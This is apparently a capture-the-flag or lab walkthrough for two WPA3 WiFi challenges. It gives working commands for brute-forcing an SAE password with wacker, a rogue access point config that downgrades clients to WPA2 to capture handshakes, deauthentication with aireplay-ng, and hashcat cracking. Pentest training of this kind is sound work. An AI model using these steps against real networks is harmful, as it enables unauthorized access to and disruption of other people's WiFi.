SAE WPA3
13. What is the wifi-management password?

In WPA3 networks it is still possible to brute force until the password is found, to do this we can use “wacker”.
https://github.com/blunderbuss-wctf/wacker
sudo ./wacker.py --wordlist ~/10-million-password-list-top-100000.txt --ssid wifi-management --bssid F0:9F:C2:11:0A:24 --interface wlan2 --freq 2462


14. What is the wifi-IT password?
If a network with WPA3 SAE has a client configured for WPA2/WPA3 we can perform a downgrade against the client forcing it to connect to our RogueAP with WPA2 obtaining the handshake to crack it later, as in the case of wifi-offices. In this case we can see that the AP uses SAE and PSK, so maybe the clients accept PSK too. We can get this information in the airodump-ng “.csv” file.


hostapd-sae.conf
interface=wlan1
driver=nl80211
hw_mode=g
channel=11
ssid=wifi-IT
mana_wpaout=hostapd-management.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678
This is a Hostapd configuration file used to set up a fake access point (AP) for penetration testing purposes. Here’s a breakdown of each line:
1️⃣ Interface & Driver Configuration
interface=wlan1
driver=nl80211
interface=wlan1
→ Specifies that wlan1 is the wireless network interface to be used for hosting the fake AP.driver=nl80211
→ Uses the nl80211 driver, which is common for modern Linux-based wireless devices.
2️⃣ Wireless Mode & Channel Selection
hw_mode=g
channel=11
hw_mode=g
→ Sets the 802.11g standard, which operates on the 2.4 GHz band and supports speeds up to 54 Mbps.channel=11
→ Specifies Channel 11 (2462 MHz) for the AP.
3️⃣ SSID & WPA Handshake Capture
ssid=wifi-IT
mana_wpaout=hostapd-management.hccapx
ssid=wifi-IT
→ This is the SSID (Wi-Fi network name) that the AP will broadcast.mana_wpaout=hostapd-management.hccapx
→ Captures WPA handshakes and saves them in the HCCAPX format, which is used for offline password cracking with Hashcat.
4️⃣ WPA Security Settings
iniCopyEditwpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678
wpa=2
→ Configures WPA2 encryption (stronger than WPA1).wpa_key_mgmt=WPA-PSK
→ Uses Pre-Shared Key (PSK) authentication.wpa_pairwise=TKIP CCMP
→ Supports both TKIP (legacy) and CCMP (AES-based, stronger encryption).wpa_passphrase=12345678
→ Sets the Wi-Fi password to12345678
.
What This Configuration Does
✅ Creates a fake Wi-Fi network named "wifi-IT"
on channel 11 (2.462 GHz).
✅ Uses WPA2-PSK encryption with the password "12345678"
.
✅ Captures WPA handshakes in HCCAPX format for cracking later.
✅ Uses wlan1 interface with nl80211 driver.
hostapd-mana hostapd-sae.conf

We can check if the AP has MFP(802.11w) with Wireshark:

In this case 802.11w is disabled so we can deauth:
# In this case 802.11w is disabled so we can deauth
iwconfig wlan0mon channel 11
aireplay-ng wlan0mon -0 0 -a F0:9F:C2:1A:CA:25 -c 10:F9:6F:AC:53:52

And you will be able to capture the handshake.

Save the hccapx to pcap
hcxhash2cap --hccapx=hostapd-management.hccapx -c aux-management.pcap
Export the 22000 hash mode from the pcap
hcxpcapngtool aux-management.pcap -o hash-management.22000

Crack outside the VM or with a new version of hashcat.
sudo hashcat -a 0 -m 22000 hash-management.22000 ~/10-million-password-list-top-100000.txt --force


Last updated